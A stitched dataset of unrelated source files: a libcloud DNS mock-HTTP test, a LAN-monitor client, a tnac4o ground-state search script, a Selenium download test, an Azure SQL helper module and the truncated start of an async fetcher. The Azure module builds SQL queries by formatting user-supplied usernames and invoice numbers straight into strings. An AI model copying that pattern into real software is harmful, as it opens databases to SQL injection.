httplib.responses[httplib.OK])
def _v1_0_11111_domains_12345678_records_28536_RECORD_DOES_NOT_EXIST(self, method, url, body, headers):
body = self.fixtures.load('does_not_exist.json')
return (httplib.NOT_FOUND, body, self.base_headers,
httplib.responses[httplib.NOT_FOUND])
def _v1_0_11111_domains_CREATE_ZONE(self, method, url, body, headers):
# Async response - create_zone
body = self.fixtures.load('create_zone_success.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_status_288795f9_e74d_48be_880b_a9e36e0de61e_CREATE_ZONE(self, method, url, body, headers):
# Async status - create_zone
body = self.fixtures.load('create_zone_success.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_domains_CREATE_ZONE_VALIDATION_ERROR(self, method, url, body, headers):
body = self.fixtures.load('create_zone_validation_error.json')
return (httplib.BAD_REQUEST, body, self.base_headers,
httplib.responses[httplib.BAD_REQUEST])
def _v1_0_11111_status_116a8f17_38ac_4862_827c_506cd04800d5(self, method, url, body, headers):
        # Async status - update_zone
body = self.fixtures.load('update_zone_success.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_status_586605c8_5739_43fb_8939_f3a2c4c0e99c_CREATE_RECORD(self, method, url, body, headers):
        # Async status - create_record
body = self.fixtures.load('create_record_success.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_domains_2946063_records_CREATE_RECORD(self, method, url, body, headers):
        # Async response - create_record
body = self.fixtures.load('create_record_success.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_status_251c0d0c_95bc_4e09_b99f_4b8748b66246(self, method, url, body, headers):
        # Async response - update_record
body = self.fixtures.load('update_record_success.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_domains_2946063_records_A_7423034(self, method, url, body,
headers):
        # Async response - update_record
body = self.fixtures.load('update_record_success.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_status_0b40cd14_2e5d_490f_bb6e_fdc65d1118a9(self, method,
url, body,
headers):
# Async status - delete_zone
body = self.fixtures.load('delete_zone_success.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_status_0b40cd14_2e5d_490f_bb6e_fdc65d1118a9_RECORD_DOES_NOT_EXIST(self, method, url, body, headers):
# Async status - delete_record
body = self.fixtures.load('delete_record_success.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_domains_2946063_records_A_7423034_RECORD_DOES_NOT_EXIST(self, method, url, body, headers):
# Async response - delete_record
body = self.fixtures.load('does_not_exist.json')
return (httplib.NOT_FOUND, body, self.base_headers,
httplib.responses[httplib.NOT_FOUND])
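# Illustrative only: a simplified sketch of how MockHttp dispatches requests to
# the handler methods above. Roughly, the URL path is turned into a method name
# by replacing '/', '.' and '-' with '_', with self.type appended as a suffix
# when set (e.g. '_CREATE_ZONE'). The helper below is not part of libcloud.
def _example_path_to_handler_name(path='/v1.0/11111/domains', type_=None):
    name = path.replace('/', '_').replace('.', '_').replace('-', '_')
    if type_:
        name = '%s_%s' % (name, type_)
    return name  # -> '_v1_0_11111_domains'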
if __name__ == '__main__':
sys.exit(unittest.main())
| 41.441955 | 120 | 0.634313 |
4a211b0a0a86b839a1c143a0bb84b14382d06861 | 3,457 | py | Python | client/client.py | wrighteagle2d/lanmonitor | 823b65257be9548785bc2bb94c28cd6df2d92a8e | [
"BSD-2-Clause"
] | 3 | 2017-10-12T02:27:07.000Z | 2019-08-06T03:04:51.000Z | client/client.py | wrighteagle2d/lanmonitor | 823b65257be9548785bc2bb94c28cd6df2d92a8e | [
"BSD-2-Clause"
] | null | null | null | client/client.py | wrighteagle2d/lanmonitor | 823b65257be9548785bc2bb94c28cd6df2d92a8e | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python
import re
import os
import time
import socket
import commands
host = "192.168.26.160"
port = 50000
server_count = 0
team_name_map = {
re.compile("WE20"): "WrightEagle",
re.compile("WrightEagle"): "WrightEagle",
re.compile("helios_"): "Helios",
re.compile("nq"): "LsuAmoyNQ",
re.compile("oxsy"): "Oxsy",
re.compile("BS2kAgent"): "BrainStormers",
re.compile("SputCoach"): "BrainStormers",
re.compile("NemesisAgent"): "Nemesis",
re.compile("sample_"): "Agent2D",
re.compile("marlik_"): "Marlik",
re.compile("ESKILAS"): "Eskilas"
}
def build_message():
message = ""
message += uptime()
message += process_status()
message += test_info()
return message
def uptime():
return commands.getoutput("uptime").strip()
def process_status():
global server_count
server_name = "rcssserver"
server_user = ""
server_count = 0
process_list = commands.getoutput("ps -e -o comm,user=").strip().split("\n")
process_list.pop(0)
team_count_map = {}
cmd_count_map = {}
matched_cmds = {}
for process in process_list:
info = process.split()
(cmd, user) = (info[0], info[1])
cmd_count_map[cmd] = 1 + cmd_count_map.get(cmd, 0)
for pattern in team_name_map.keys():
if pattern.match(cmd):
matched_cmds[cmd] = 1
team_name = team_name_map[pattern]
team_count_map[team_name] = 1 + team_count_map.get(team_name, 0)
break
if not server_user and cmd == server_name:
server_user = user
if cmd_count_map.has_key(server_name):
server_count = cmd_count_map[server_name]
message = ""
if server_count:
message += "; #rcss: %d" % server_count
if server_user:
message += ", %s" % server_user
if len(team_count_map) >= 1:
message += "; ("
for team in sorted(team_count_map.keys()):
message += "%s x %d, " % (team, team_count_map[team])
message = message.rstrip(", ") + ")"
return message
def test_info():
message = ""
if server_count > 0:
if os.path.exists("/tmp/autotest::temp"):
message += "; autotest::temp"
if os.path.exists("/tmp/result.html") and os.access("/tmp/result.html", os.R_OK):
game_count = commands.getoutput("cat /tmp/result.html | grep \'>Game Count\' | sed \'s/ / /g\' | awk \'{print $5}\'")
win_rate = commands.getoutput("cat /tmp/result.html | grep \' WinRate\' | sed \'s/ / /g\' | awk \'{print $6}\'").strip(",")
if len(game_count) > 0 and len(win_rate) > 0:
message += "; #game: " + game_count + ", " + win_rate + "%"
return message
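# Hypothetical helper (not in the original module): registering one more
# binary-name pattern for process_status() to recognise; the pattern and team
# name would be supplied by the caller.
def register_team(pattern, team_name):
    team_name_map[re.compile(pattern)] = team_name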
def communicate(s):
while 1:
try:
s.sendall(build_message())
except socket.error, (value, message):
print "send error: " + message
break
time.sleep(30)
def run():
while 1:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host,port))
except socket.error, (value, message):
print "connect error: " + message
s.close()
time.sleep(1)
continue
communicate(s)
s.close()
run()
| 27.656 | 146 | 0.554527 |
4a211bd0d224c4d753e9e1f7b869a9a04d9683dc | 5,322 | py | Python | examples/e06_search_gs_degeneracy_J124.py | marekrams/tnac4o | 41a2294842d1e129662e9cd61cc5eca7d3edb2d9 | [
"Apache-2.0"
] | 10 | 2020-06-12T02:32:30.000Z | 2022-01-19T11:11:31.000Z | examples/e06_search_gs_degeneracy_J124.py | marekrams/tnac4o | 41a2294842d1e129662e9cd61cc5eca7d3edb2d9 | [
"Apache-2.0"
] | 3 | 2020-06-04T18:59:02.000Z | 2020-06-11T11:15:12.000Z | examples/e06_search_gs_degeneracy_J124.py | marekrams/tnac4o | 41a2294842d1e129662e9cd61cc5eca7d3edb2d9 | [
"Apache-2.0"
] | 1 | 2022-01-19T11:39:56.000Z | 2022-01-19T11:39:56.000Z | # Copyright 2021 Marek M. Rams, Masoud Mohseni, Bartlomiej Gardas. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import argparse
import time
import tnac4o
import os
import numpy as np
def search_gs_J124(C=8, instance=1,
rot=0, beta=0.75,
D=48,
M=2**12, relative_P_cutoff=1e-8,
precondition=True):
'''
Runs a script searching for a ground state of a J124 instance defined on a chimera graph.
The ground state degeneracy is counted at no extra cost.
Instances are located in the folder ./../instances/.
    Reasonable (but not necessarily optimal) values of parameters for those instances are set as default.
Some can be changed using options in this script. See documentation for more information.
'''
# Initialize global logging level to INFO.
logging.basicConfig(level='INFO')
# filename of the instance of interest
if C == 8:
Nx, Ny, Nc = 8, 8, 8
filename_in = os.path.join(os.path.dirname(__file__),
'./../instances/Chimera_J124/C=8_J124/%03d.txt' % instance)
elif C == 12:
Nx, Ny, Nc = 12, 12, 8
filename_in = os.path.join(os.path.dirname(__file__),
'./../instances/Chimera_J124/C=12_J124/%03d.txt' % instance)
elif C == 16:
Nx, Ny, Nc = 16, 16, 8
filename_in = os.path.join(os.path.dirname(__file__),
'./../instances/Chimera_J124/C=16_J124/%03d.txt' % instance)
# load Jij couplings
J = tnac4o.load_Jij(filename_in)
# those instances are defined with spin numering starting with 1
# change to 0-base indexing
J = tnac4o.Jij_f2p(J)
# initializes solver
ins = tnac4o.tnac4o(mode='Ising', Nx=Nx, Ny=Ny, Nc=Nc, J=J, beta=beta)
ins.logger.info('Analysing J124 instance %1d on chimera graph of %1d sites.' % (instance, Nx * Ny * Nc))
# rotates graph to contract from different side/edge
if rot > 0:
ins.rotate_graph(rot=rot)
# applies preconditioning using balancing heuristics
if precondition:
ins.precondition(mode='balancing')
# search ground state (return lowest energy, full data stored in ins)
Eng = ins.search_ground_state(M=M, relative_P_cutoff=relative_P_cutoff, Dmax=D)
return ins
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-C", type=int, choices=[8, 12, 16], default=8,
help="Size of the chimera graph. Default is C8 (N=512).")
parser.add_argument("-ins", type=int, choices=range(1, 201), metavar="[1-200]", default=1,
help="Instance number (1-100). Default is 1.")
parser.add_argument("-b", type=float, default=0.75,
help="Inverse temperature. Default is set at 3.")
parser.add_argument("-D", type=int, default=48,
help="Maximal bond dimension of boundary MPS used to contract PEPS.")
parser.add_argument("-M", type=int, default=2**12,
help="Maximal number of partial states kept during branch-and-bound search.")
parser.add_argument("-P", type=float, default=1e-8,
help="Cuttof on the range of relative probabilities kept during branch-and-bound search.")
parser.add_argument("-s", dest='s', action='store_true',
help="Save results to txt file in ./results/")
parser.add_argument('-no-pre', dest='pre', action='store_false', help="Do not use preconditioning.")
parser.set_defaults(pre=True)
args = parser.parse_args()
Engs, degs = [], []
for rot in range(4):
keep_time = time.time()
ins = search_gs_J124(C=args.C, instance=args.ins, rot=rot, beta=args.b,
D=args.D, M=args.M, relative_P_cutoff=args.P, precondition=args.pre)
ins.logger.info('Rotation %1d; Total time : %.2f seconds', rot, time.time() - keep_time)
ins.show_solution(state=False)
Engs.append(ins.energy)
degs.append(ins.degeneracy)
Eng = min(Engs)
best = tuple(ii for ii, E in enumerate(Engs) if E == Eng)
deg = max(degs[ii] for ii in best)
print('Best found energy and its degeneracy for J124 instances on chimera graph C%1d, instance %1d' %(args.C, args.ins))
print('Energy = %1d' % Eng)
print('Degeneracy = %1d' % deg)
if args.s:
# save it to ./results/*.txt
filename = os.path.join(os.path.dirname(__file__),
'./results/J124_C=%1d_ins=%03d_beta=%0.2f_D=%1d_M=%1d_pre=%1d.txt'
% (args.C, args.ins, args.b, args.D, args.M, args.pre))
np.savetxt(filename, np.array([Eng, deg], dtype=int), delimiter=' ', header='Energy and degeneracy', fmt='%1d')
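# Usage sketch (illustrative): the search can also be driven directly from
# Python instead of via argparse; the keyword values below are this script's
# defaults.
def example_direct_call():
    ins = search_gs_J124(C=8, instance=1, rot=0, beta=0.75, D=48, M=2**12)
    return ins.energy, ins.degeneracy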
| 43.983471 | 124 | 0.637166 |
4a211c03164e87665d942fb261920e7bc1acceaf | 956 | py | Python | tests/src/CRC/check_performance_of_schoolwise_csv_download.py | JalajaTR/cQube | 6bf58ab25f0c36709630987ab730bbd5d9192c03 | [
"MIT"
] | null | null | null | tests/src/CRC/check_performance_of_schoolwise_csv_download.py | JalajaTR/cQube | 6bf58ab25f0c36709630987ab730bbd5d9192c03 | [
"MIT"
] | 2 | 2022-02-01T00:55:12.000Z | 2022-03-29T22:29:09.000Z | tests/src/CRC/check_performance_of_schoolwise_csv_download.py | JalajaTR/cQube | 6bf58ab25f0c36709630987ab730bbd5d9192c03 | [
"MIT"
] | null | null | null | import os
import time
from selenium.webdriver.support.select import Select
from Data.parameters import Data
from get_dir import pwd
from reuse_func import GetData
class download_schoollevel_csv():
def __init__(self,driver):
self.driver = driver
def test_schoolwise(self):
self.cal = GetData()
self.driver.find_element_by_xpath(Data.hyper).click()
self.cal.page_loading(self.driver)
p = pwd()
District_wise = Select(self.driver.find_element_by_id("downloader"))
District_wise.select_by_visible_text(" School_Wise Report ")
self.cal.page_loading(self.driver)
self.driver.find_element_by_id(Data.Download).click()
self.cal.page_loading(self.driver)
self.filename = p.get_download_dir() + "/School_level_CRC_Report.csv"
self.cal.page_loading(self.driver)
return os.path.isfile(self.filename)
def remove_csv(self):
os.remove(self.filename)
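# Hypothetical driver for the check above (constructing the selenium webdriver
# is assumed to happen elsewhere, e.g. in the suite's fixtures).
def run_schoolwise_check(driver):
    check = download_schoollevel_csv(driver)
    downloaded = check.test_schoolwise()
    if downloaded:
        check.remove_csv()
    return downloaded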
| 28.117647 | 76 | 0.713389 |
4a211d30e9ab19e8a4867609462d28c0a0799276 | 9,417 | py | Python | instance/db/azure/connazure.py | instance-id/verifier | 1d15f8203aeeb61d79658a77481bb846ab0f58bc | [
"MIT"
] | 7 | 2019-05-16T05:01:48.000Z | 2022-01-09T08:07:13.000Z | instance/db/azure/connazure.py | instance-id/verifier | 1d15f8203aeeb61d79658a77481bb846ab0f58bc | [
"MIT"
] | 5 | 2019-12-26T17:27:01.000Z | 2022-01-31T11:31:16.000Z | instance/db/azure/connazure.py | instance-id/verifier | 1d15f8203aeeb61d79658a77481bb846ab0f58bc | [
"MIT"
] | 1 | 2022-01-28T09:53:43.000Z | 2022-01-28T09:53:43.000Z | import pyodbc
import jsoncfg
from datetime import datetime
import traceback
import logging
# <editor-fold desc="Logging definitions">
from colorlog import ColoredFormatter
log = logging.getLogger(__name__)
LOG_LEVEL = logging.DEBUG
LOGFORMAT = " %(log_color)s%(levelname)-8s%(reset)s | %(log_color)s%(message)s%(reset)s"
logging.root.setLevel(LOG_LEVEL)
formatter = ColoredFormatter(LOGFORMAT)
stream = logging.StreamHandler()
stream.setLevel(LOG_LEVEL)
stream.setFormatter(formatter)
log.setLevel(LOG_LEVEL)
log.addHandler(stream)
# </editor-fold>
config = jsoncfg.load_config('instance/config/dbconfig.json')
# config = jsoncfg.load_config('../../../config/dbconfig.json')
dbdata = config.dbdata()
dbprefix = dbdata['dbprefix']
def dosql(sql, args=None, commit=False, response=None, num=0, curret=False):
driver = '{ODBC Driver 17 for SQL Server}'
cnxn = 'DRIVER=' + driver
    cnxn += ';PORT=1433;SERVER=' + dbdata['address']
    cnxn += ';DATABASE=' + dbdata['dbname']
    cnxn += ';UID=' + dbdata['usename']
    cnxn += ';PWD=' + dbdata['password']
conn = pyodbc.connect(cnxn)
finish = False
result = 'Process ended before it was supposed to.'
try:
with conn.cursor() as cursor:
if args is not None:
cur = cursor.execute(sql, args)
else:
cur = cursor.execute(sql)
if curret is True:
return cur
if commit is True:
conn.commit()
if response is not None:
if response == 'single':
result = cursor.fetchone()
elif response == 'many':
result = cursor.fetchmany(num)
elif response == 'all':
result = cursor.fetchall()
elif response == 'id':
result = cursor.fetchone()
else:
pass
finally:
conn.close()
if response:
return result
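# Illustrative helper (not part of the original module): dosql opens and closes
# its own connection, so a one-off lookup reduces to a single call. The table
# name below is supplied by the caller.
def _example_count_rows(table):
    row = dosql("SELECT COUNT(*) FROM [%s]" % table, None, False, 'single')
    return None if row is None else row[0]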
# (sql, args=None, commit=False, response=None, num=0)
def db_setup():
validated_users = dbprefix + 'validated_users'
packages = dbprefix + 'packages'
args = validated_users
sql = "SELECT * FROM information_schema.tables WHERE table_name= '%s'" % args
usersresult = dosql(sql, None, False, 'single')
args = packages
sql = "SELECT * FROM information_schema.tables WHERE table_name = '%s'" % args
packagesresult = dosql(sql, None, False, 'single')
if usersresult is None:
args = (validated_users, validated_users)
sql = f"""
IF NOT EXISTS
(select * from INFORMATION_SCHEMA.TABLES where TABLE_NAME = '%s')
CREATE TABLE %s (
user_id int IDENTITY PRIMARY KEY,
username VARCHAR(50) NOT NULL,
email VARCHAR(75),
)""" % args
dosql(sql, None, True)
if packagesresult is None:
args = (packages, packages, validated_users)
sql = f"""
IF NOT EXISTS
(select * from INFORMATION_SCHEMA.TABLES where TABLE_NAME = '%s')
CREATE TABLE %s (
ID INT IDENTITY PRIMARY KEY,
user_id int FOREIGN KEY REFERENCES %s (user_id),
username VARCHAR(50) NOT NULL,
invoice VARCHAR (15) UNIQUE,
package VARCHAR(50),
purdate VARCHAR(10),
verifydate VARCHAR(10),
)""" % args
dosql(sql, None, True)
return "Creation of database tables completed."
else:
return "Tables already exist: " + usersresult[2] + " and " + packagesresult[2]
# Invoice lookup for automated verification process
# (sql, args=None, commit=False, response=None, num=0)
def find_invoice(invoice):
args = dbprefix, invoice
sql = "SELECT * FROM [%spackages] WHERE [invoice] = '%s'" % args
invoiceresult = dosql(sql, None, False, 'single')
if invoiceresult:
return True
else:
return False
# If the user has already registered an invoice,
# append the new invoice; otherwise create a new entry
# (sql, args=None, commit=False, response=None, num=0)
def add_invoice(username, invoice, package, purdate, email=''):
args = dbprefix, invoice
sql = "SELECT * FROM [%spackages] WHERE [invoice] = '%s'" % args
invoiceresult = dosql(sql, None, False, 'single')
if invoiceresult is None:
args = dbprefix, username
sql = "SELECT * FROM [%svalidated_users] WHERE [username] = '%s'" % args
nameresult = dosql(sql, None, False, 'single')
if nameresult is not None:
if nameresult:
args = dbprefix, email, username,
sql = "UPDATE [%svalidated_users] SET [email] = '%s' WHERE [username] = '%s'" % args
dosql(sql, None, True)
args = dbprefix, int(nameresult[0]), username, invoice, package, purdate, str(datetime.now().strftime("%Y-%m-%d"))
sql = "INSERT INTO [%spackages] ([user_id], [username], [invoice], [package], [purdate], [verifydate]) VALUES ('%s', '%s', '%s', '%s', '%s', '%s')" % args
result = dosql(sql, None, True)
return result
if nameresult is None:
try:
args = dbprefix, username, email
sql = "INSERT INTO [%svalidated_users] ([username],[email]) VALUES ('%s', '%s')" % args
dosql(sql, None, True)
args = dbprefix, username
sql = "SELECT [user_id] FROM [%svalidated_users] WHERE [username] = '%s'" % args
insertresult = dosql(sql, None, False, 'single')
if insertresult:
args = dbprefix, int(insertresult.user_id), username, invoice, package, purdate, str(
datetime.now().strftime("%Y-%m-%d"))
sql = "INSERT INTO [%spackages] ([user_id], [username], [invoice], [package], [purdate], [verifydate]) VALUES ( '%s', '%s', '%s', '%s', '%s', '%s')" % args
result = dosql(sql, None, True)
return result
except Exception as e:
                print(f'Could not insert row: {e}')
traceback.print_exc()
else:
return 'Invoice number already registered. Please contact support.'
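# Call sketch for the registration flow above (all literal values invented):
def _example_register():
    if not find_invoice('IN-0000001'):
        return add_invoice('alice', 'IN-0000001', 'ExamplePackage',
                           '2019-05-01', '[email protected]')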
# Invoice deletion - use carefully
def delete_invoice(invoice):
args = dbprefix, invoice
sql = "DELETE FROM [%spackages] WHERE [invoice] = '%s'" % args
invoiceresult = dosql(sql, None, True)
return 'Deletion Completed'
# ------------------------ Manual lookup processes -------------------------------
def search_invoice(invoice):
driver = '{ODBC Driver 17 for SQL Server}'
cnxn = 'DRIVER=' + driver
    cnxn += ';PORT=1433;SERVER=' + dbdata['address']
    cnxn += ';DATABASE=' + dbdata['dbname']
    cnxn += ';UID=' + dbdata['usename']
    cnxn += ';PWD=' + dbdata['password']
conn = pyodbc.connect(cnxn)
with conn.cursor() as cursor:
args = dbprefix, invoice
sql = "SELECT * FROM [%spackages] WHERE [invoice] = '%s'" % args
invoiceresult = cursor.execute(sql)
if invoiceresult is not None:
data1 = []
columns = [column[0] for column in invoiceresult.description]
for row in invoiceresult.fetchall():
data1.append(dict(zip(columns, row)))
if not data1:
conn.close()
return 'No invoice found', False
if invoiceresult is not None:
conn.close()
if not data1:
return 'No invoice found', False
data2 = [d for d in data1][0]
return data2['username'], data2
else:
conn.close()
return 'No invoice found', False
def search_user(username):
driver = '{ODBC Driver 17 for SQL Server}'
cnxn = 'DRIVER=' + driver
    cnxn += ';PORT=1433;SERVER=' + dbdata['address']
    cnxn += ';DATABASE=' + dbdata['dbname']
    cnxn += ';UID=' + dbdata['usename']
    cnxn += ';PWD=' + dbdata['password']
conn = pyodbc.connect(cnxn)
with conn.cursor() as cursor:
args = (dbprefix, username + '%',)
sql = "SELECT [username] FROM [%svalidated_users] WHERE [username] LIKE '%s'" % args
userresult = cursor.execute(sql)
data1 = []
columns = [column[0] for column in userresult.description]
for row in userresult.fetchall():
data1.append(dict(zip(columns, row)))
with conn.cursor() as cursor:
args = (dbprefix, username + '%',)
sql = "SELECT [invoice], [package], [purdate], [verifydate] FROM [%spackages] WHERE [username] LIKE '%s'" % args
userresult2 = cursor.execute(sql)
data2 = []
columns2 = [column[0] for column in userresult2.description]
for row in userresult2.fetchall():
data2.append(dict(zip(columns2, row)))
conn.close()
    if len(data1) == 0:
        return 'User not found.'
    elif len(data2) == 0:
return data1
else:
packlist = {'packages': data2}
data1[0].update(packlist)
if data1:
return data1
else:
return 'No User found'
| 37.971774 | 176 | 0.561431 |
4a211d7f79f1e589c5bf2b9681c92c0011815821 | 6,016 | py | Python | taxamo/models/transaction_lines.py | piotrts/taxamo-python | be3b46a6ec320166999987b65384376be6f57111 | [
"Apache-2.0"
] | null | null | null | taxamo/models/transaction_lines.py | piotrts/taxamo-python | be3b46a6ec320166999987b65384376be6f57111 | [
"Apache-2.0"
] | null | null | null | taxamo/models/transaction_lines.py | piotrts/taxamo-python | be3b46a6ec320166999987b65384376be6f57111 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""
Copyright 2014-2015 Taxamo, Ltd.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
class Transaction_lines:
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually."""
def __init__(self):
self.swaggerTypes = {
'product_type': 'str',
'deducted_tax_amount': 'number',
'deducted_tax_rate': 'number',
'supply_date': 'str',
'invoice_image_url': 'str',
'tax_number_service': 'str',
'seller_tax_number': 'str',
'id': 'number',
'tax_supported': 'bool',
'unit_price': 'number',
'unit_of_measure': 'str',
'quantity': 'number',
'custom_fields': 'list[custom_fields]',
'tax_region': 'str',
'line_key': 'str',
'invoice_number': 'str',
'product_class': 'str',
'tax_name': 'str',
'product_code': 'str',
'amount': 'number',
'invoice_image_url_secret': 'str',
'custom_id': 'str',
'informative': 'bool',
'tax_amount': 'number',
'tax_entity_additional_id': 'str',
'ship_from_country_code': 'str',
'tax_rate': 'number',
'additional_currencies': 'additional_currencies',
'total_amount': 'number',
'product_tax_code': 'str',
'tax_entity_name': 'str',
'refunded_tax_amount': 'number',
'description': 'str',
'tax_deducted': 'bool',
'tax_country_code': 'str',
'refunded_total_amount': 'number'
}
#Product type, according to dictionary /dictionaries/product_types.
self.product_type = None # str
        #Deducted tax amount, calculated by taxamo.
self.deducted_tax_amount = None # number
#Deducted tax rate, calculated by taxamo.
self.deducted_tax_rate = None # number
#Date of supply in yyyy-MM-dd format.
self.supply_date = None # str
#Invoice image URL - provided by Taxamo.
self.invoice_image_url = None # str
#Tax number service identifier - if available for a given region and the region is enabled.
self.tax_number_service = None # str
#Seller's tax number in the tax country - used for physical goods and assigned from merchant configuration.
self.seller_tax_number = None # str
#Generated id.
self.id = None # number
#Is tax supported on this line.
self.tax_supported = None # bool
#Unit price.
self.unit_price = None # number
#Unit of measure.
self.unit_of_measure = None # str
        #Quantity. Defaults to 1.
self.quantity = None # number
#Custom fields, stored as key-value pairs. This property is not processed and used mostly with Taxamo-built helpers.
self.custom_fields = None # list[custom_fields]
#Tax region code - e.g. EU, US, NO, JP...
self.tax_region = None # str
#Generated line key.
self.line_key = None # str
#Invoice number.
self.invoice_number = None # str
#Product class
self.product_class = None # str
#Tax name, calculated by taxamo. Can be overwritten when informative field is true.
self.tax_name = None # str
#Internal product code, used for invoicing for example.
self.product_code = None # str
#Amount. Required if total amount or both unit price and quantity are not provided.
self.amount = None # number
#Invoice image URL secret - provided by Taxamo.
self.invoice_image_url_secret = None # str
#Custom id, provided by ecommerce software.
self.custom_id = None # str
#If the line is provided for informative purposes. Such line must have :tax-rate and optionally :tax-name - if not, API validation will fail for this line.
self.informative = None # bool
#Tax amount, calculated by taxamo.
self.tax_amount = None # number
#Tax entity additional id.
self.tax_entity_additional_id = None # str
#Two-letter ISO country code, e.g. FR.
self.ship_from_country_code = None # str
#Tax rate, calculated by taxamo. Must be provided when informative field is true.
self.tax_rate = None # number
#Additional currency information - can be used to receive additional information about invoice in another currency.
self.additional_currencies = None # additional_currencies
#Total amount. Required if amount or both unit price and quantity are not provided.
self.total_amount = None # number
#External product tax code for a line, for example TIC in US Sales tax.
self.product_tax_code = None # str
#To which entity is the tax due.
self.tax_entity_name = None # str
        #Refunded tax amount, calculated by taxamo.
self.refunded_tax_amount = None # number
#Line contents description.
self.description = None # str
#True if the transaction line is deducted from tax and no tax is applied (it is untaxed).
self.tax_deducted = None # bool
#Two-letter ISO country code, e.g. FR.
self.tax_country_code = None # str
        #Refunded total amount, calculated by taxamo.
self.refunded_total_amount = None # number
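# Illustrative only: populating a minimal informative line by hand (the field
# choices below are assumptions, not taxamo guidance; see the per-field notes
# above).
def example_informative_line():
    line = Transaction_lines()
    line.informative = True
    line.amount = 100.0
    line.tax_rate = 23.0 # must be provided when informative is true
    line.tax_name = 'VAT'
    return line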
| 43.912409 | 163 | 0.62234 |
4a211d8599ba1f4e18ec9d13b40278d79f7c5d46 | 2,523 | py | Python | iotbx/cns/index_fobs_sigma_reader.py | rimmartin/cctbx_project | 644090f9432d9afc22cfb542fc3ab78ca8e15e5d | [
"BSD-3-Clause-LBNL"
] | null | null | null | iotbx/cns/index_fobs_sigma_reader.py | rimmartin/cctbx_project | 644090f9432d9afc22cfb542fc3ab78ca8e15e5d | [
"BSD-3-Clause-LBNL"
] | null | null | null | iotbx/cns/index_fobs_sigma_reader.py | rimmartin/cctbx_project | 644090f9432d9afc22cfb542fc3ab78ca8e15e5d | [
"BSD-3-Clause-LBNL"
] | null | null | null | from __future__ import division
from cctbx import miller
from cctbx import crystal
from cctbx.array_family import flex
class index_fobs_sigma_line(object):
def __init__(self, raw_line):
self.is_complete = False
flds = raw_line.replace("="," ").split()
if (len(flds) != 8): return
if (flds[0].lower() not in ("inde", "index")): return
if (flds[4].lower() != "fobs"): return
if (flds[6].lower() != "sigma"): return
self.names = [flds[4], flds[6]]
try: self.index = tuple([int(i) for i in flds[1:4]])
except Exception: return
try: self.fobs = float(flds[5])
except Exception: return
try: self.sigma = float(flds[7])
except Exception: return
self.is_complete = True
class reader(object):
def __init__(self, file_name=None, file_object=None, max_header_lines=30):
assert [file_name, file_object].count(None) == 1
if (file_object is None):
file_object = open(file_name)
self._names = None
self._indices = flex.miller_index()
self._data = flex.double()
self._sigmas = flex.double()
have_data = False
self.n_lines = 0
for raw_line in file_object:
self.n_lines += 1
ifs = index_fobs_sigma_line(raw_line)
if (not ifs.is_complete):
if (raw_line.strip().lower() == "end"):
break
if (self.n_lines == max_header_lines or have_data):
raise RuntimeError, "Unkown file format."
else:
if (self._names is None): self._names = ifs.names
self._indices.append(ifs.index)
self._data.append(ifs.fobs)
self._sigmas.append(ifs.sigma)
have_data = True
if (not have_data):
raise RuntimeError, "No data found in file."
def indices(self):
return self._indices
def data(self):
return self._data
def sigmas(self):
return self._sigmas
def as_miller_arrays(self,
crystal_symmetry=None,
force_symmetry=False,
merge_equivalents=True,
base_array_info=None):
if (crystal_symmetry is None):
crystal_symmetry = crystal.symmetry()
if (base_array_info is None):
base_array_info = miller.array_info(source_type="cns_index_fobs_sigma")
miller_set = miller.set(
crystal_symmetry=crystal_symmetry,
indices=self.indices()).auto_anomalous()
return [miller.array(
miller_set=miller_set,
data=self.data(),
sigmas=self.sigmas())
.set_info(base_array_info.customized_copy(labels=self._names))
.set_observation_type_xray_amplitude()]
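# Usage sketch (the file name is an assumption): parse a CNS
# "INDE h k l FOBS= ... SIGMA= ..." reflection file and convert it to a
# single miller array.
def example_read(file_name="fobs_sigma.cns"):
  return reader(file_name=file_name).as_miller_arrays()[0]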
| 31.5375 | 77 | 0.659929 |
4a211e180e7870255408fadb2547d0b159a5c05f | 17,674 | py | Python | AsyncFetcher.py | bakwc/PyAsyncFetcher | 06bfdabe43ec1154230961d6ec796998a94b2cf3 | [
"MIT"
] | null | null | null | AsyncFetcher.py | bakwc/PyAsyncFetcher | 06bfdabe43ec1154230961d6ec796998a94b2cf3 | [
"MIT"
] | null | null | null | AsyncFetcher.py | bakwc/PyAsyncFetcher | 06bfdabe43ec1154230961d6ec796998a94b2cf3 | [
"MIT"
] | null | null | null | import time
import thread
import httplib
import socket
import select
import os
from collections import defaultdict
import Queue
from StringIO import StringIO
import random
# ------------------------------------------------------------------------------------
class ERROR:
CONNECTION_FAILED = -100
CONNECTION_DROPED = -101
MAX_QUEUE_SIZE = -110
MAX_HOST_CONNECTIONS = - 111
# ------------------------------------------------------------------------------------
class SETTINGS:
